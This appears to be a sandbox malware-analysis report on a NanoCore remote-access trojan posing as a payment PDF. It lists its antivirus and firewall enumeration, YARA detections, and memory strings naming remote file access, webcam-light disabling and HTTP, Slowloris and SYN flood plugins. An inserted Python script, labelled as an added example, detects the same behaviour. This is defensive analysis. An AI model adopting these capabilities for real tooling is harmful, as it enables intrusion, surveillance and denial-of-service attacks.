Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06A20DB0 GetSystemTimes, 13_2_06A20DB0
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
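The three ExecQuery lines above are NanoCore's security-product inventory, and they are issued from a copy of RegAsm.exe that runs out of the user's Temp folder rather than the .NET framework directory. The Python below is an added example, not part of the Joe Sandbox report or its signature set: it triages WMI-query records shaped after those three lines and flags a process that enumerates AntiVirusProduct, AntiSpywareProduct and FirewallProduct, or that runs a .NET framework utility from an unexpected path. The WmiEvent field names, the benign svchost.exe record (PID 1204) and the list of .NET utilities are assumptions; PID 6732 for RegAsm.exe is the one the report shows.

```python
"""Triage WMI SecurityCenter2 enumeration from a process telemetry feed.

Added example; the records in SAMPLE_EVENTS are constructed to mirror the
report's three queries and are not taken from a real log.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# .NET framework utilities that loaders commonly hollow; genuine copies live under
# C:\Windows\Microsoft.NET\Framework[64]\. The set is an assumption for the example.
DOTNET_LOLBINS = {"regasm.exe", "regsvcs.exe", "msbuild.exe",
                  "installutil.exe", "aspnet_compiler.exe"}
FRAMEWORK_DIR = re.compile(r"^c:\\windows\\microsoft\.net\\framework(64)?\\", re.I)
SECURITY_CLASSES = {"antivirusproduct", "antispywareproduct", "firewallproduct"}
FROM_RE = re.compile(r"\bfrom\s+(\w+)", re.I)


@dataclass(frozen=True)
class WmiEvent:
    pid: int
    image: str       # full path of the process that called IWbemServices::ExecQuery
    namespace: str   # e.g. ROOT\SecurityCenter2
    query: str       # WQL text


def query_class(query: str) -> str:
    """Class name after FROM, lower-cased, or '' if the WQL has no FROM clause."""
    m = FROM_RE.search(query)
    return m.group(1).lower() if m else ""


def is_securitycenter2(ev: WmiEvent) -> bool:
    return ev.namespace.replace("/", "\\").lower().endswith("\\securitycenter2")


def reasons_for(ev: WmiEvent) -> list[str]:
    """Per-event findings; an empty list means nothing stands out."""
    out: list[str] = []
    cls = query_class(ev.query)
    if is_securitycenter2(ev) and cls in SECURITY_CLASSES:
        out.append(f"enumerates {cls} in ROOT\\SecurityCenter2")
    folder, _, name = ev.image.rpartition("\\")
    if name.lower() in DOTNET_LOLBINS and not FRAMEWORK_DIR.match(ev.image):
        out.append(f"{name.lower()} executing from {folder} instead of the .NET framework directory")
    return out


def triage(events) -> dict[int, list[str]]:
    """Aggregate findings per PID. A process that pulls all three security-product
    classes gets an extra finding even if its image path looks normal."""
    findings: dict[int, list[str]] = defaultdict(list)
    classes: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        for r in reasons_for(ev):
            if r not in findings[ev.pid]:
                findings[ev.pid].append(r)
        cls = query_class(ev.query)
        if is_securitycenter2(ev) and cls in SECURITY_CLASSES:
            classes[ev.pid].add(cls)
    for pid, seen in classes.items():
        if seen == SECURITY_CLASSES:
            findings[pid].append("full security-product inventory (AV, antispyware, firewall)")
    return dict(findings)


# Constructed records: the report's three RegAsm.exe queries plus one benign query.
SAMPLE_EVENTS = [
    WmiEvent(6732, r"C:\Users\user\AppData\Local\Temp\RegAsm.exe", r"ROOT\SecurityCenter2",
             "SELECT DisplayName FROM AntiVirusProduct"),
    WmiEvent(6732, r"C:\Users\user\AppData\Local\Temp\RegAsm.exe", r"ROOT\SecurityCenter2",
             "SELECT DisplayName FROM AntiSpywareProduct"),
    WmiEvent(6732, r"C:\Users\user\AppData\Local\Temp\RegAsm.exe", r"ROOT\SecurityCenter2",
             "SELECT DisplayName FROM FirewallProduct"),
    WmiEvent(1204, r"C:\Windows\System32\svchost.exe", r"ROOT\cimv2",
             "SELECT Name FROM Win32_Process"),
]

if __name__ == "__main__":
    for pid, why in triage(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(why))
```

Each finding on its own is noisy (some management agents do query SecurityCenter2), so the path check and the full-inventory check are kept separate and only their combination on PID 6732 reads as the report's behaviour.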

Stealing of Sensitive Information:

Yara detected Nanocore RAT
Source: Yara match | File source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat
Source: Paymentcheck.pdf.exe, 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEv